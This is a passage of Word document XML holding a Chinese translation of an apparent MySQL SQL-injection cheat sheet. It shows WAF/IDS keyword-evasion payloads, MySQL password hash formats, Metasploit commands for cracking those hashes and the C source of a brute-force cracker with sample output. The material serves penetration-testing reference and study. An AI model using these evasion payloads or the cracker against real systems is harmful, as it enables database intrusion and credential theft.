            <w:tcW w:w="6224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SELECT %u0074able_%u6eame FROM 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</w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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无效十六进制编码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 xml:space="preserve"> (ASP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6224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SELECT %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tab%le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_%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na%me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 FROM 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;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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:num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  <w:bookmarkStart w:id="66" w:name="_Toc11111_WPSOffice_Level2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>回避关键词</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66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如果IDS/WAF阻止了某些关键字，则可以使用其他方法绕过它而不使用编码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信息图表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4909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4039"/>
      </w:tblGrid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Spaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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</w:t>
            </w:r>
            <w:proofErr w:type="gram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schema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 .</w:t>
            </w:r>
            <w:proofErr w:type="gram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 xml:space="preserve"> tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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反引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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`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information_schema`.`tables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`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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特定代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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/*!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information_schema.tables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*/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="87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替代名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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information_schema.partitions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br/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information_schema.statistics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br/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information_schema.key_column_usage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br/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information_schema.table_constraints</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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注：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备用名称可能取决于表中存在的主键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pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532"/>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532"/>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532"/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67" w:name="_Toc9213_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>二十一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6478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4320"/>
      </w:tblGrid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1" w:anchor="operator_and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AND , &amp;&amp;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逻辑与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2" w:anchor="operator_assign-equa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=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赋值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作为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instrText xml:space="preserve"> HYPERLINK "http://dev.mysql.com/doc/refman/5.6/en/set-statement.html" \t "https://websec.ca/kb/_blank" </w:instrTex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Style w:val="a4"/>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> 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语句，或作为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML0"/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 SET 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从句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instrText xml:space="preserve"> HYPERLINK "http://dev.mysql.com/doc/refman/5.6/en/update.html" \t "https://websec.ca/kb/_blank" </w:instrTex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Style w:val="a4"/>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>UPDATE 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声明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3" w:anchor="operator_assign-value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:=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赋值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4" w:anchor="operator_between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BETWEEN ... AND ...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检查一个值是否在值的范围内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5" w:anchor="operator_binary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BINARY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将字符串转换为二进制字符串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6" w:anchor="operator_bitwise-and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&amp;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按位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与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7" w:anchor="operator_bitwise-invert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~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倒位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8" w:anchor="operator_bitwise-or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|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按位或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19" w:anchor="operator_bitwise-xor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^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按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位异或</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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0" w:anchor="operator_case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CASE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案例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1" w:anchor="operator_div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DIV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整数除法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2" w:anchor="operator_divide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/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除法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3" w:anchor="operator_equal-to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&lt;=&gt;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空安全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等于运算符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4" w:anchor="operator_equa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=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等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于运算符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5" w:anchor="operator_greater-than-or-equa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&gt;=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大于或等于运算符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6" w:anchor="operator_greater-than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&gt;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大于运算符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7" w:anchor="operator_is-not-nul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IS NOT NULL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非零值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检验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8" w:anchor="operator_is-not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IS NOT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根据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布尔值进行测试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29" w:anchor="operator_is-nul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IS NULL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零值检验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0" w:anchor="operator_is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IS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对布尔值进行测试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1" w:anchor="operator_left-shift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&lt;&lt;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左移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2" w:anchor="operator_less-than-or-equa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&lt;=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小于或相等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3" w:anchor="operator_less-than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&lt;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小于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4" w:anchor="operator_like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LIKE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简单模式匹配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5" w:anchor="operator_minus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-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负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6" w:anchor="operator_mod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% or MOD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模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7" w:anchor="operator_not-between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NOT BETWEEN ... AND ...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检查某个值是否</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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不在值</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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的范围内。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8" w:anchor="operator_not-equal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!= , &lt;&gt;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不相等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39" w:anchor="operator_not-like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NOT LIKE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简单模式匹配的否定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0" w:anchor="operator_not-regexp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NOT REGEXP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REGEXP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的否定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1" w:anchor="operator_not" w:tgtFrame="https://websec.ca/kb/_blank" w:history="1">
              <w:proofErr w:type="gramStart"/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NOT ,</w:t>
              </w:r>
              <w:proofErr w:type="gramEnd"/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 !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否定值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2" w:anchor="operator_or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|| , OR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逻辑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OR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3" w:anchor="operator_plus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+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加法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4" w:anchor="operator_regexp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REGEXP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使用正则表达式的模式匹配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5" w:anchor="operator_right-shift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&gt;&gt;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右移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6" w:anchor="operator_regexp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RLIKE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REGEXP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的同义词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7" w:anchor="operator_sounds-like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SOUNDS LIKE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比较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音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8" w:anchor="operator_times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*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乘法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18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>运算符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49" w:anchor="operator_unary-minus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-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更改论点的符号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2158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914E2D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hyperlink r:id="rId50" w:anchor="operator_xor" w:tgtFrame="https://websec.ca/kb/_blank" w:history="1">
              <w:r w:rsidR="002F3109">
                <w:rPr>
                  <w:rStyle w:val="a4"/>
                  <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
                  <w:color w:val="000000"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>XOR</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320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逻辑异或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68" w:name="_Toc2668_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二十二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="14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</w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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current_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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null, \N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1447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sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>true, false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Cs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc588_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>二十三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码散列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69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在MySQL4.1之前，由Password()函数计算的密码散列长度为16字节。这样的散列看起来如下：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3974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879"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="209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PASSWORD('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mypass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')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="187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6f8c114b58f2ce9e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对于MySQL 4.1，PASSWORD（）函数已被修改以产生更长的41字节散列值：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tbl>
      <w:tblPr>
        <w:tblW w:w="6674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579"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2095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PASSWORD('</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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mypass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4579" w:type="dxa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 w:rsidR="00C91532" w:rsidRDefault="002F3109">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc11410_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二十四</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码破解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/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Cain &amp; Abel和John the Ripper都能破解MySQL 3.x-6.x密码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下面链接可以找到用于JTR的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Metasploit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模块。http://www.metasploit.com/modules/auxiliary/analyze/jtr_mysql_fast.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约翰开膛手MySQL密码破解(快速模式)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描述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这个模块使用“开膛手约翰”来识别从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MySQL_hashdump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模块获得的弱密码。密码已成功破解，然后保存为适当的凭据。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要显示可用的选项，请在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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控制台中加载模块，并运行命令“显示选项”或“显示高级”：</w:t>
      </w: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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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&gt; use auxiliary/analyze/</w:t>
      </w:r>
      <w:proofErr w:type="spell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jtr_mysql_fast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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auxiliary(</w:t>
      </w:r>
      <w:proofErr w:type="spell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jtr_mysql_fast</w:t>
      </w:r>
      <w:proofErr w:type="spell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) &gt; show actions</w:t>
      </w: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...actions...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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auxiliary(</w:t>
      </w:r>
      <w:proofErr w:type="spell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jtr_mysql_fast</w:t>
      </w:r>
      <w:proofErr w:type="spell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) &gt; set ACTION &lt; action-name &gt;</w:t>
      </w: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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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auxiliary(</w:t>
      </w:r>
      <w:proofErr w:type="spell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jtr_mysql_fast</w:t>
      </w:r>
      <w:proofErr w:type="spell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) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr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   ...show and set options...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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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 xml:space="preserve"> auxiliary(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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jtr_mysql_fast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) &gt; ru</w:t>
      </w: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n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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> MySQL&lt;4.1密码破解器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109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4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这个工具是一个用于MySQL哈希密码的高速蛮力密码破解器.它可以破解一个包含任何可打印的ASCII字符的8字符密码，在普通PC上只需几个小时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr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/*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This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program is public domain. Share and enjoy.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Example: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* $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gcc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-O2 -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fomit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-frame-pointer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MySQLfast.c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-o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MySQLfast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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* $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MySQLfast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6294b50f67eda209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Hash: 6294b50f67eda209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Trying length 3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Trying length 4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Found pass: barf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The MySQL password hash function could be strengthened considerably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*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by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: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- making two passes over the password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* - using a bitwise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rotate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instead of a left shift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 - causing more arithmetic overflows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*/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#include &lt;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stdio.h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&gt;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typedef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unsigned long u32;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/* Allowable characters in password; 33-126 is printable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ascii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*/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#define MIN_CHAR 33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#define MAX_CHAR 126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/* Maximum length of password */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#define MAX_LEN 12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#define MASK 0x7fffffffL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crack0(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stop, u32 targ1, u32 targ2,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*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i, c;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u32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d, e, sum, step, diff, div, xor1, xor2, state1, state2;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u32 newstate1, newstate2, newstate3;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u32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MAX_LEN-2], state2_ary[MAX_LEN-2];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u32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xor_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MAX_LEN-3],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step_ary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[MAX_LEN-3];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bookmarkStart w:id="71" w:name="_Toc32192_WPSOffice_Level1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 = -1;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/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sum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7;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0] = 1345345333L;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state2_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0] = 0x12345671L;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while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(1)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while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(i &lt; stop)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++;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 = MIN_CHAR;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step_ary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 = (state1_ary[i] &amp; 0x3f) + sum;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  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xor_ary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[i] =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step_ary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[i]*MIN_CHAR + (state1_ary[i] &lt;&lt; 8);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sum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+= MIN_CHAR;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i+1] = state1_ary[i] ^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xor_ary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state2_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 = state2_ary[i]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  + ((state2_ary[i] &lt;&lt; 8) ^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state1 =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state2 = state2_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step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(state1 &amp; 0x3f) + sum;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xor1 = step*MIN_CHAR + (state1 &lt;&lt; 8);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xor2 = (state2 &lt;&lt; 8) ^ state1;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for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(c = MIN_CHAR; c &lt;= MAX_CHAR;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c++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, xor1 += step)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newstate2 = state2 + (xor1 ^ xor2);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newstate1 = state1 ^ xor1;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newstate3 = (targ2 - newstate2) ^ (newstate2 &lt;&lt; 8);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div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(newstate1 &amp; 0x3f) + sum + c;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diff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((newstate3 ^ newstate1) - (newstate1 &lt;&lt; 8)) &amp; MASK;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(diff % div != 0) continue;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bookmarkStart w:id="72" w:name="_Toc18728_WPSOffice_Level1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d = diff / div;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/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(d &lt; MIN_CHAR || d &gt; MAX_CHAR) continue;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div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(newstate3 &amp; 0x3f) + sum + c + d;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diff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((targ1 ^ newstate3) - (newstate3 &lt;&lt; 8)) &amp; MASK;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(diff % div != 0) continue;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bookmarkStart w:id="73" w:name="_Toc23878_WPSOffice_Level1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e = diff / div;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/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(e &lt; MIN_CHAR || e &gt; MAX_CHAR) continue;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 = c;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i+2] = d;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i+3] = e;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return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1;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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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while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(i &gt;= 0 &amp;&amp;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 &gt;= MAX_CHAR)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sum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-= MAX_CHAR;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i--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(i &lt; 0) break;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]+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+;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xor_ary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[i] +=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step_ary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sum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++;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i+1] = state1_ary[i] ^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xor_ary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state2_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 = state2_ary[i]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+ ((state2_ary[i] &lt;&lt; 8) ^ state1_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ary[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i+1]);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return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0;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lastRenderedPageBreak/>
        <w:t>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void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crack(char *hash)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i,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bookmarkStart w:id="74" w:name="_Toc25690_WPSOffice_Level1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u32 targ1, targ2, targ3;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/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pass[MAX_LEN];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sscanf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(hash, "%8lx%lx", &amp;targ1, &amp;targ2) != 2 )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printf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"Invalid password hash: %s\n", hash);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return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printf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"Hash: %08lx%08lx\n", targ1, targ2);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targ3 = targ2 - targ1;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targ3 = targ2 - ((targ3 &lt;&lt; 8) ^ targ1);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targ3 = targ2 - ((targ3 &lt;&lt; 8) ^ targ1);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targ3 = targ2 - ((targ3 &lt;&lt; 8) ^ targ1);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for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= 3;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&lt;= MAX_LEN;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++)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printf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"Trying length %d\n",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 crack0(len-4, targ1, targ3, pass) ) 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printf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"Found pass: ");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for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(i = 0; i &lt;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; i++)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putchar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pass[i]);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putchar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'\n');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break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len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&gt; MAX_LEN)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printf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"Pass not found\n");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}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main(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argc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, char *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argv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[])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{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i;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if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argc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&lt;= 1)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printf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(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"usage: %s hash\n",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argv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[0]);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for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(i = 1; i &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spell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argc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; i++)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crack(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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argv</w:t>
      </w:r>
      <w:proofErr w:type="spell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[i]);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 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="atLeast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}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C91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E2D" w:rsidRDefault="00914E2D" w:rsidP="002A05A2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00914E2D" w:rsidRDefault="00914E2D" w:rsidP="002A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叶根友毛笔行书2.0版">
    <w:altName w:val="Arial Unicode MS"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000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E2D" w:rsidRDefault="00914E2D" w:rsidP="002A05A2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00914E2D" w:rsidRDefault="00914E2D" w:rsidP="002A0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E456"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8182E4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9BAB9BE4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9BAB9BE4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="9E77549D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E7754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9EA81509"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EA815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9FA5B5E7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9FA5B5E7"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="B1CCDA46"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B1CCDA46"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="BB3A93B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB3A93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C3140BD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3140B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C40526F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C40526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C8DC9BDE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8DC9B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D00D3491"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D00D34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D325CED1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D325CE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D43DE7DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D43DE7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nsid w:val="E3114BC8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3114B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E7550E2C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E7550E2C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15">
    <w:nsid w:val="F0E34E41"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0E34E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>
    <w:nsid w:val="F4D7FAEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4D7FA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nsid w:val="F9DD039C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9DD0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nsid w:val="FD5FE658"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FD5FE658"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19">
    <w:nsid w:val="FE58ED14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE58ED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>
    <w:nsid w:val="011A54F6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="011A54F6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21">
    <w:nsid w:val="04C573B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04C573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2">
    <w:nsid w:val="05F530FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05F530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0DB67F3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DB67F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>
    <w:nsid w:val="250BE6FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="250BE6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>
    <w:nsid w:val="2EF10364"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2EF103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>
    <w:nsid w:val="2F1AB7D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F1AB7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7">
    <w:nsid w:val="437813F4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="437813F4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28">
    <w:nsid w:val="53546F2F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="53546F2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CB96127"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5CB96127"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30">
    <w:nsid w:val="5D585BCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D585B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>
    <w:nsid w:val="6A6D7417"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A6D74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2">
    <w:nsid w:val="6ACE9C91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6ACE9C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>
    <w:nsid w:val="758EF279"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="758EF2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>
    <w:nsid w:val="76A2E870"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76A2E8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4"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="19"/>
